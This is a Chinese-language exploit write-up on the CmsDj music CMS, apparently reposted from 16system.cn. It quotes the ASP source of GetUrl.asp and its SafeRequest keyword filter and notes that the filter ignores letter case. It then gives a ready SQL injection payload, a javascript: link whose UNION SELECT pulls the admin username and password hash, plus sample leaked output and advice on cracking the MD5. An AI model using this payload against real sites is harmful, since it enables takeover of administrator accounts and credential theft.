<!--#Include File="CmsDj.Conn.asp"-->
<!--#Include File="CmsDj.Function.asp"-->
<%
From_url = Cstr(Request.ServerVariables("HTTP_REFERER"))
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME"))
If mid(From_url,8,len(Serv_url)) <> Serv_url Then //判断REFERER
Response.Write "不支持外部链接!"
Response.End
End If
id=SafeRequest("id","get") //获取参数id
ac=SafeRequest("ac","get") //获取 ac
Set CmsDjMusic = New CmsDj_Com_Dj
Set CmsDjServer = New CmsDj_Com_Server
Set Rs = CmsDjMusic.GetRs("CD_ID,CD_Url,CD_Server,CD_Singer,CD_Name,CD_ClassID",0,"CD_ID="&ID) //id带入 SQL
If rs.EOF And rs.BOF Then
Response.write " "
Response.End
Else
If Rs("CD_Server")<>0 Then
Set RsServer = CmsDjServer.GetRs("CD_Url",0,"CD_ID="&Rs("CD_Server"))
PlayUrl = RsServer("CD_Url")&Rs("CD_Url")
Set RsServer = Nothing
Else
PlayUrl = Rs("CD_Url")
End If
End If
CD_Url=LCase(Rs("CD_Url"))
If left(CD_Url,18)="http://www.rayfile" Then
HttpUrl=CD_Url
CmsDj_Com_RayFileA = GetHttpPage(HttpUrl,"utf-8")
CmsDj_Com_RayFileB=GetBody(CmsDj_Com_RayFileA,"<div class=""btn_indown_zh-cn""><a href=""","""></a></div><div id=""divsavetomyfile""",False,False)
CmsDj_Com_RayFileC = GetHttpPage(CmsDj_Com_RayFileB,"utf-8")
PlayUrl=GetBody(CmsDj_Com_RayFileC,"var downloads_url = ['","'];",False,False)
End If
If ac="lplay" Then
Response.Write "var i"&rs("CD_ID")&"="""&rs("CD_ID")&""";var s"&rs("CD_ID")&"="""&rs("CD_Singer")&""";var n"&rs("CD_ID")&"="""&rs("CD_Name")&""";var u"&rs("CD_ID")&"="""&PlayUrl&""";var t"&rs("CD_ID")&"="""&rs("CD_ClassID")&""";" //打印内容
Else
Response.write PlayUrl
End If
Set Rs = Nothing
%>
SafeRequest 函数 代码:
Function SafeRequest(Key,Modes)
Dim ParaValue,strFilter,FilterArr,i
Select Case Lcase(Modes)
Case "get"
ParaValue=Trim(Request.QueryString(Key))
Case "post"
ParaValue=Trim(Request.Form(Key))
Case "auto"
ParaValue=Trim(Request(Key))
End Select
IF IsNum(ParaValue) Then
SafeRequest=ParaValue
Exit Function
Else //如果获取的参数值不为数字 ,这检查是否包含以下关键字
strFilter="'|and|(|)|exec|insert|select|delete|update|*|chr|mid|master|truncate|declare"
FilterArr=Split(strFilter,"|")
For i=0 To Ubound(FilterArr)
IF Instr(ParaValue,FilterArr(i))>0 Then
ParaValue=ReplaceStr(ParaValue,FilterArr(i),DBC2SBC(FilterArr(i),0))
End IF
Next
SafeRequest=ParaValue
End IF
SafeRequest = FilterScript(SafeRequest)
End Function
但却没有考虑大小写,同时判断了REFERER,只要带上REFERER同时大小写下sql语句就行了
exp:
javascript:document.write("<a href='/include/GetUrl.asp?ac=lplay&id=-1 Union Select CD_AdminUserName,CD_AdminPassWord,null,4,5,6 From CmsDj_Admin'>Click me</a>");void(0);
var iadmin="admin";var sadmin="4";var nadmin="5";var uadmin="1bfb4b8ad622424eb8302ae5d622424eb8302ae5";var tadmin="6";
其中iadmin=后面是帐号,uadmin="后面是md5,注意md5只取前16位破解就行了
来源:16system.cn
